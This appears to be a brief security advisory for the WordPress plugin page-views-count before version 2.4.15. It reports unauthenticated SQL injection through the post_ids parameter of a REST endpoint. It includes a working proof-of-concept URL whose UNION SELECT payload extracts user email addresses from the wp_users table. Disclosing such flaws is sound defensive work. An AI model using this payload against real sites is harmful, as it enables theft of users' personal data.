The plugin does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint, available to both unauthenticated and authenticated users. As a result, unauthenticated attackers could perform SQL injection attacks
https://example.com/?rest_route=/pvc/v1/increase/1&post;_ids=0)%20union%20select%20user_email,user_email,user_email%20from%20wp_users%20–%20g
CPE | Name | Operator | Version |
---|---|---|---|
page-views-count | lt | 2.4.15 |